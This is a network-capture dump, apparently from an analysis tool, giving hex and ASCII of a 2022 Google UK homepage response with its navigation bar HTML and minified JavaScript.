                                                  2022-06-26 07:48:21 UTC24INData Raw: 2c 42 61 29 3b 70 28 22 61 67 6c 22 2c 44 61 29 3b 68 2e 6f 3d 78 61 7d 3b 76 61 72 20 46 61 3d 68 2e 62 28 22 30 2e 31 22 2c 2e 30 30 31 29 2c 47 61 3d 30 3b 0a 66 75 6e 63 74 69 6f 6e 20 5f 6d 6c 54 6f 6b 65 6e 28 61 2c 62 29 7b 74 72 79 7b 69 66 28 31 3e 47 61 29 7b 47 61 2b 2b 3b 76 61 72 20 63 3d 61 3b 62 3d 62 7c 7c 7b 7d 3b 76 61 72 20 64 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 2c 66 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 22 26 6a 65 78 70 69 64 3d 22 2c 64 28 22 32 38 38 33 34 22 29 2c 22 26 73 72 63 70 67 3d 22 2c 64 28 22 70 72 6f 70 3d 31 22 29 2c 22 26 6a 73 72 3d 22 2c 4d 61 74 68 2e
                                                  Data Ascii: ,Ba);p("agl",Da);h.o=xa};var Fa=h.b("0.1",.001),Ga=0;function _mlToken(a,b){try{if(1>Ga){Ga++;var c=a;b=b||{};var d=encodeURIComponent,f=["//www.google.com/gen_204?atyp=i&zx=",(new Date).getTime(),"&jexpid=",d("28834"),"&srcpg=",d("prop=1"),"&jsr=",Math.
                                                  2022-06-26 07:48:21 UTC25INData Raw: 61 72 67 75 6d 65 6e 74 73 3b 67 2e 71 6d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5b 62 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 64 29 7d 29 7d 7d 2c 4f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 0a 5b 4c 61 3f 22 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 2c 22 2f 6f 67 2f 5f 2f 6a 73 2f 64 3d 31 2f 6b 3d 22 2c 22 6f 67 2e 6f 67 32 2e 65 6e 5f 55 53 2e 51 51 49 52 4e 4f 6c 4c 54 37 38 2e 4f 22 2c 22 2f 72 74 3d 6a 2f 6d 3d 22 2c 61 2c 22 2f 72 73 3d 22 2c 22 41 41 32 59 72 54 76 49 67 38 4f 7a 4d 4e 63 67 79 68 74 44 54 50 49 6d 4b 7a 31 37 78 4c 4e 35 75 41 22 5d 3b 4b 61 26 26 61 2e 70 75 73 68 28 22 3f 68 6f 73 74 3d 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 26 62 75 73 74 3d 6f 67 2e 6f 67 32 2e 65 6e 5f 55
                                                  Data Ascii: arguments;g.qm(function(){a[b].apply(this,d)})}},Oa=function(a){a=[La?"":"https://www.gstatic.com","/og/_/js/d=1/k=","og.og2.en_US.QQIRNOlLT78.O","/rt=j/m=",a,"/rs=","AA2YrTvIg8OzMNcgyhtDTPImKz17xLN5uA"];Ka&&a.push("?host=www.gstatic.com&bust=og.og2.en_U
                                                  2022-06-26 07:48:21 UTC26INData Raw: 76 61 72 20 6b 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 69 66 28 4f 3d 3d 64 29 4f 3d 76 6f 69 64 20 30 2c 0a 4b 28 6b 2c 22 67 62 74 6f 22 29 3b 65 6c 73 65 7b 69 66 28 4f 29 7b 76 61 72 20 6d 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 4f 29 3b 69 66 28 6d 26 26 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 29 7b 76 61 72 20 6e 3d 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6f 77 6e 65 72 22 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6e 29 3b 6c 26 26 6c 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 4b 28 6c 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 22 67 62 74 6f 22 29 7d 7d 7d 24 61 28 66 29 26 26 61 62 28 66 29 3b 4f 3d 64 3b
                                                  Data Ascii: var k=b.parentNode;if(O==d)O=void 0,K(k,"gbto");else{if(O){var m=document.getElementById(O);if(m&&m.getAttribute){var n=m.getAttribute("aria-owner");if(n.length){var l=document.getElementById(n);l&&l.parentNode&&K(l.parentNode,"gbto")}}}$a(f)&&ab(f);O=d;
                                                  2022-06-26 07:48:21 UTC27INData Raw: 28 22 6c 69 22 29 2c 7a 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 67 62 6d 74 63 22 3b 7a 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 67 62 6d 74 20 67 62 6d 68 22 3b 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 7a 29 3b 6b 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 79 2c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 6c 5d 29 7d 67 2e 61 64 64 48 6f 76 65 72 26 26 67 2e 61 64 64 48 6f 76 65 72 28 61 29 7d 65 6c 73 65 20 6b 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 29 7d 7d 63 61 74 63 68 28 45 62 29 7b 72 28 45 62 2c 22 73 62 22 2c 22 61 6c 22 29 7d 7d 2c 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 62 2e 6c 65 6e 67 74 68 2c 0a 64 3d 30 3b 64 3c 63
                                                  Data Ascii: ("li"),z=document.createElement("div");y.className="gbmtc";z.className="gbmt gbmh";y.appendChild(z);k.insertBefore(y,k.childNodes[l])}g.addHover&&g.addHover(a)}else k.appendChild(m)}}catch(Eb){r(Eb,"sb","al")}},fb=function(a,b){for(var c=b.length,d=0;d<c
                                                  2022-06-26 07:48:21 UTC29INData Raw: 6e 65 72 48 54 4d 4c 3d 66 3b 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 29 7d 7d 65 6c 73 65 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 62 3b 51 28 61 2c 21 30 29 7d 7d 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 28 62 3d 76 6f 69 64 20 30 21 3d 3d 62 3f 62 3a 21 30 29 3f 4a 28 61 2c 22 67 62 6d 73 67 6f 22 29 3a 4b 28 61 2c 22 67 62 6d 73 67 6f 22 29 7d 2c 24 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 2c 63 3b 63 3d 61 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 62 5d 3b 62 2b 2b 29 69 66 28 48 28 63 2c 22 67 62 6d 73 67 22 29 29 72 65 74 75 72 6e 20 63 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 71 62 26 26 77 69 6e 64 6f 77 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 71 62 29 7d 2c 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                  Data Ascii: nerHTML=f;d.appendChild(k)}}else d.innerHTML=b;Q(a,!0)}}},Q=function(a,b){(b=void 0!==b?b:!0)?J(a,"gbmsgo"):K(a,"gbmsgo")},$a=function(a){for(var b=0,c;c=a.childNodes[b];b++)if(H(c,"gbmsg"))return c},P=function(){qb&&window.clearTimeout(qb)},ub=function(a
                                                  2022-06-26 07:48:21 UTC30INData Raw: 35 35 64 36 61 36 62 37 38 37 64 63 63 32 61 34 30 36 32 65 36 65 39 38 32 34 2e 6a 73 22 2c 69 6e 64 65 78 3a 22 22 2c 6c 61 6e 67 3a 22 65 6e 22 7d 3b 76 2e 67 63 3d 42 62 3b 76 61 72 20 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 61 70 69 73 26 26 77 69 6e 64 6f 77 2e 69 66 72 61 6d 65 73 3f 61 26 26 61 28 29 3a 28 61 26 26 74 61 28 61 29 2c 44 28 22 67 63 22 29 29 7d 3b 70 28 22 6c 47 43 22 2c 43 62 29 3b 68 2e 61 28 22 31 22 29 26 26 70 28 22 6c 50 57 46 22 2c 43 62 29 7d 3b 77 69 6e 64 6f 77 2e 5f 5f 50 56 54 3d 22 22 3b 69 66 28 68 2e 61 28 22 31 22 29 26 26 68 2e 61 28 22 31 22 29 29 7b 76 61 72 20 44 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 43 62 28 66 75 6e 63 74 69 6f 6e 28 29 7b 41 28 22 70 77 22 2c 61
                                                  Data Ascii: 55d6a6b787dcc2a4062e6e9824.js",index:"",lang:"en"};v.gc=Bb;var Cb=function(a){window.googleapis&&window.iframes?a&&a():(a&&ta(a),D("gc"))};p("lGC",Cb);h.a("1")&&p("lPWF",Cb)};window.__PVT="";if(h.a("1")&&h.a("1")){var Db=function(a){Cb(function(){A("pw",a
                                                  2022-06-26 07:48:21 UTC31INData Raw: 2e 62 76 2e 66 2c 71 3d 64 28 22 31 22 29 3b 6e 3d 64 28 6e 29 3b 63 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 2f 63 29 3b 76 61 72 20 45 3d 64 28 22 34 35 35 39 37 32 34 33 31 2e 30 22 29 2c 55 3d 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 36 30 37 2e 31 5f 70 30 22 29 2c 49 3d 64 28 22 63 6f 6d 22 29 2c 56 3d 64 28 22 65 6e 22 29 2c 57 3d 0a 64 28 22 47 42 52 22 29 3b 76 61 72 20 79 3d 30 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 66 2c 22 26 6f 67 65 3d 22 2c 61 2c 22 26 6f 67 65 78
                                                  Data Ascii: .bv.f,q=d("1");n=d(n);c=Math.round(1/c);var E=d("455972431.0"),U="&oggv="+d("es_plusone_gc_20220607.1_p0"),I=d("com"),V=d("en"),W=d("GBR");var y=0;h.a("")&&(y|=1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",f,"&oge=",a,"&ogex
                                                  2022-06-26 07:48:21 UTC32INData Raw: 62 29 3b 70 28 22 73 70 73 22 2c 57 62 29 3b 70 28 22 73 70 64 22 2c 24 62 29 3b 70 28 22 70 61 61 22 2c 54 62 29 3b 70 28 22 70 72 6d 22 2c 55 62 29 3b 6d 62 28 22 67 62 64 34 22 2c 55 62 29 3b 0a 69 66 28 68 2e 61 28 22 22 29 29 7b 76 61 72 20 61 63 3d 7b 64 3a 68 2e 61 28 22 22 29 2c 65 3a 22 22 2c 73 61 6e 77 3a 68 2e 61 28 22 22 29 2c 70 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28 22 31 22 29 2c 6d 67 3a 22 25 31 24 73 20 28 64 65 6c 65 67 61 74 65 64 29 22 2c 6d 64 3a 22 25 31 24 73 20 28 64 65 66 61 75 6c 74 29 22 2c 6d 68 3a 22 32 32 30 22 2c 73 3a 22 31 22 2c 70 70 3a 5a 62 2c
                                                  Data Ascii: b);p("sps",Wb);p("spd",$b);p("paa",Tb);p("prm",Ub);mb("gbd4",Ub);if(h.a("")){var ac={d:h.a(""),e:"",sanw:h.a(""),p:"https://lh3.googleusercontent.com/ogw/default-user=s96",cp:"1",xp:h.a("1"),mg:"%1$s (delegated)",md:"%1$s (default)",mh:"220",s:"1",pp:Zb,
                                                  2022-06-26 07:48:21 UTC34INData Raw: 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 62 65 68 61 76 69 6f 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 6c 6f 61 64 7d 2c 6d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 6a 63 28 64 6f 63 75 6d 65 6e 74 29 7c 7c 28 64 7c 7c 28 62 3d 22 6f 67 2d 75 70 2d 22 2b 62 29 2c 6b 63 28 29 3f 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49
                                                  Data Ascii: c=function(){try{return!!e.localStorage&&"object"==typeof e.localStorage}catch(a){return!1}},lc=function(a){return a&&a.style&&a.style.behavior&&"undefined"!=typeof a.load},mc=function(a,b,c,d){try{jc(document)||(d||(b="og-up-"+b),kc()?e.localStorage.setI
                                                  2022-06-26 07:48:21 UTC35INData Raw: 7b 73 70 3a 68 2e 62 28 22 30 2e 30 31 22 2c 31 29 2c 74 6c 64 3a 22 63 6f 2e 75 6b 22 2c 70 72 69 64 3a 22 31 22 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 72 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 6f 72 28 76 61 72 20 6c 3b 28 6c 3d 6b 5b 6d 2b 2b 5d 29 26 26 22 6d 22 21 3d 6c 5b 30 5d 26 26 21 6c 5b 31 5d 2e 61 75 74 6f 3b 29 3b 6c 26 26 28 73 61 28 32 2c 6c 5b 30 5d 29 2c 6c 5b 31 5d 2e 75 72 6c 26 26 72 61 28 6c 5b 31 5d 2e 75 72 6c 2c 6c 5b 30 5d 29 2c 6c 5b 31 5d 2e 6c 69 62 73 26 26 43 26 26 43 28 6c 5b 31 5d 2e 6c 69 62 73 29 29 3b 6d 3c 6b 2e 6c 65 6e 67 74 68 26 26 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 30 3c 66 2d 2d 3f 73 65 74 54 69 6d 65 6f 75 74 28 62 2c 30 29 3a 61 28 29 7d 76 61 72
                                                  Data Ascii: {sp:h.b("0.01",1),tld:"co.uk",prid:"1"});function rc(){function a(){for(var l;(l=k[m++])&&"m"!=l[0]&&!l[1].auto;);l&&(sa(2,l[0]),l[1].url&&ra(l[1].url,l[0]),l[1].libs&&C&&C(l[1].libs));m<k.length&&setTimeout(a,0)}function b(){0<f--?setTimeout(b,0):a()}var
                                                  2022-06-26 07:48:21 UTC36INData Raw: 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 64 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 65 2e 69 3b 76 61 72 20 67 3d 66 2e 63 28 22 31 22 2c 30 29 2c 68 3d 2f 5c 62 67 62 6d 74 5c 62 2f 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 22 2b 67 29 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 22 2b 61 29 3b 62 26 26 66 2e 6c 28 62 2c 68 2e 74 65 73 74 28 62 2e 63 6c 61
                                                  Data Ascii: sure Library Authors. SPDX-License-Identifier: Apache-2.0*/var d=window.gbar.i.i;var e=window.gbar;var f=e.i;var g=f.c("1",0),h=/\bgbmt\b/,k=function(a){try{var b=document.getElementById("gb_"+g),c=document.getElementById("gb_"+a);b&&f.l(b,h.test(b.cla
                                                  2022-06-26 07:48:21 UTC38INData Raw: 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6b 2e 65 78 65 63 53 63 72 69 70 74 7c 7c 6b 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 68 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 6c 3b 68 2e 6c 65 6e 67 74 68 26 26 28 6c 3d 68 2e 73 68 69 66 74 28 29 29 3b 29 68 2e 6c 65 6e 67 74 68 7c 7c 76 6f 69 64 20 30 3d 3d 3d 67 3f 6b 3d 6b 5b 6c 5d 26 26 6b 5b 6c 5d 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 5b 6c 5d 3f 6b 5b 6c 5d 3a 6b 5b 6c 5d 3d 7b 7d 3a 6b 5b 6c 5d 3d 67 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74
                                                  Data Ascii: ndefined"==typeof k.execScript||k.execScript("var "+h[0]);for(var l;h.length&&(l=h.shift());)h.length||void 0===g?k=k[l]&&k[l]!==Object.prototype[l]?k[l]:k[l]={}:k[l]=g;}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(funct
                                                  2022-06-26 07:48:21 UTC39INData Raw: 67 62 5f 38 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 6d 61 70 73 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 6c 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 4d 61 70 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 37 38 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 38 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 50 6c 61 79 3c 2f 73 70 61 6e 3e 3c 2f
                                                  Data Ascii: gb_8 href="https://maps.google.co.uk/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></
                                                  2022-06-26 07:48:21 UTC40INData Raw: 22 67 62 6d 63 20 67 62 73 62 20 67 62 73 62 69 73 22 3e 3c 6f 6c 20 69 64 3d 67 62 6d 6d 20 63 6c 61 73 73 3d 22 67 62 6d 63 63 20 67 62 73 62 69 63 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 34 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6c 65 6e 64 61 72 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 61 6c 65 6e 64 61 72 3f 74 61 62 3d 77 63 22 3e 43 61 6c 65 6e 64 61 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 35 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 54 22 3e 54 72 61 6e 73
                                                  Data Ascii: "gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.co.uk/?hl=en&tab=wT">Trans
                                                  2022-06-26 07:48:21 UTC41INData Raw: 31 2c 7b 74 3a 36 36 7d 29 3b 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 73 62 74 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 73 62 62 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 67 62 67 3e 3c 68 32 20 63 6c 61 73 73 3d 67 62 78 78 3e 41 63 63 6f 75 6e 74 20 4f 70 74 69 6f 6e 73 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 63 62 3e 3c 2f 73 70 61 6e 3e 3c 6f 6c 20 63 6c 61 73 73 3d 67 62 74 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63
                                                  Data Ascii: 1,{t:66});; });</script></li></ol><div class=gbsbt></div><div class=gbsbb></div></div></div></li></ol></div><div id=gbg><h2 class=gbxx>Account Options</h2><span class=gbtcb></span><ol class=gbtc><li class=gbt><a target=_top href="https://accounts.google.c
                                                  2022-06-26 07:48:21 UTC43INData Raw: 62 78 34 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 6d 63 55 74 69 34 46 30 6e 31 4c 53 35 44 72 76 4a 70 76 4d 42 51 27 3e 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 65 6c 70 26 26 67 62 61 72 2e 65 6c 70 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 63 65 6e 74 65 72 3e 3c 62 72 20 63 6c 65 61 72 3d 22 61 6c 6c 22 20 69 64 3d 22 6c 67 70 64 22 3e 3c 64 69 76 20 69 64 3d 22 6c 67 61 22 3e 3c 69 6d 67 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 77 68 69 74 65 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 5f 32 37 32 78
                                                  Data Ascii: bx4></div><script nonce='mcUti4F0n1LS5DrvJpvMBQ'>window.gbar&&gbar.elp&&gbar.elp()</script></div></div><center><br clear="all" id="lgpd"><div id="lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x
                                                  2022-06-26 07:48:21 UTC44INData Raw: 61 6c 75 65 29 7b 74 68 69 73 2e 63 68 65 63 6b 65 64 20 3d 20 31 3b 69 66 20 28 74 68 69 73 2e 66 6f 72 6d 2e 69 66 6c 73 69 67 29 74 68 69 73 2e 66 6f 72 6d 2e 69 66 6c 73 69 67 2e 64 69 73 61 62 6c 65 64 20 3d 20 66 61 6c 73 65 3b 7d 0a 65 6c 73 65 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 64 6f 6f 64 6c 65 73 2f 27 3b 7d 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 41 4a 69 4b 30 65 38 41 41 41 41 41 59 72 67 64 56 54 38 65 36 56 58 30 66 63 76 6c 4d 46 4a 71 44 6a 4c 5f 71 2d 42 49 45 4d 72 4f 22 20 6e 61 6d 65 3d 22 69 66 6c 73 69 67 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 66 6c 20 73 62 6c 63 22 20 61 6c
                                                  Data Ascii: alue){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;}else top.location='/doodles/';};})();</script><input value="AJiK0e8AAAAAYrgdVT8e6VX0fcvlMFJqDjL_q-BIEMrO" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" al
                                                  2022-06-26 07:48:21 UTC45INData Raw: 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 74 70 72 65 66 64 6f 6d 61 69 6e 3f 70 72 65 66 64 6f 6d 3d 47 42 26 61 6d 70 3b 70 72 65 76 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 26 61 6d 70 3b 73 69 67 3d 4b 5f 66 55 46 49 4c 5f 43 76 43 6b 75 45 76 57 44 57 72 30 55 57 39 47 7a 34 35 74 49 25 33 44 22 3e 47 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 74 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 22 3e 26 63 6f 70 79 3b 20 32 30 32 32 20 2d 20 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 70 6f 6c 69 63 69 65 73 2f 70 72 69 76 61 63 79 2f 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 20 2d
                                                  Data Ascii: ttps://www.google.com/setprefdomain?prefdom=GB&amp;prev=https://www.google.co.uk/&amp;sig=K_fUFIL_CvCkuEvWDWr0UW9Gz45tI%3D">Google.co.uk</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2022 - <a href="/intl/en/policies/privacy/">Privacy</a> -
                                                  2022-06-26 07:48:21 UTC46INData Raw: 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 78 6a 73 6c 73 22 29 3b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 3b 76 61 72 20 63 3d 22 53 43 52 49 50 54 22 3b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 22 3d 3d 3d 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 26 26 28 63 3d 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 67 29 7b 62 3d 6e 75 6c 6c 3b 76 61 72 20 6b 3d 64 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 69 66 28 6b 26 26 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 7b 74 72 79 7b 62 3d 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63
                                                  Data Ascii: ogle.timers.load&&google.tick&&google.tick("load","xjsls");var b=document;var c="SCRIPT";"application/xhtml+xml"===b.contentType&&(c=c.toLowerCase());c=b.createElement(c);if(void 0===g){b=null;var k=d.trustedTypes;if(k&&k.createPolicy){try{b=k.createPolic
